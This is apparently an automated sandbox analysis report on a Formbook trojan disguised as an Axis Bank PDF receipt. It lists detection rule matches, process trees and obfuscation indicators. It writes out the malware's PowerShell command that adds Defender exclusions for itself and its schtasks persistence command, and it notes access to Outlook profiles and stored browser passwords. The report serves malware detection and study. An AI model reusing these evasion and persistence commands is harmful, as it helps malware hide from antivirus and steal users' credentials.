Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OkLsTLaTTZVp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, M6wynbsTFcTkCcoXC7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, M6wynbsTFcTkCcoXC7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.SetAccessControl
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.AddAccessRule
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.SetAccessControl
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.AddAccessRule
Source: 11.2.OkLsTLaTTZVp.exe.2e9ae1c.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 11.2.OkLsTLaTTZVp.exe.2e92e04.6.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6d00000.9.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.250515c.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.24baec8.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.24b2eb0.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 11.2.OkLsTLaTTZVp.exe.2ee4ea4.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/16@15/12
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp566C.tmp Jump to behavior
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: sc.exe, 0000000E.00000003.2450651858.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4513265527.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2452481488.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4513265527.0000000002FF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Virustotal: Detection: 53%
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File read: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp6A22.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp6A22.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe" Jump to behavior
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: firefox.pdbP source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2097797410.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000000.2139591971.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000000.2269120366.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdbSHA256 source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, Menu.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: OkLsTLaTTZVp.exe.0.dr, Menu.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, I1Ds3abkUA5mh3kywv.cs .Net Code: hyVW2X9uL System.Reflection.Assembly.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs .Net Code: zRsDxbBdYt System.Reflection.Assembly.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, I1Ds3abkUA5mh3kywv.cs .Net Code: hyVW2X9uL System.Reflection.Assembly.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs .Net Code: zRsDxbBdYt System.Reflection.Assembly.Load(byte[])
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, I1Ds3abkUA5mh3kywv.cs .Net Code: hyVW2X9uL System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: 0xD0FDA43C [Sat Feb 8 23:39:40 2081 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E23644 push cs; retf 0_2_06E23647
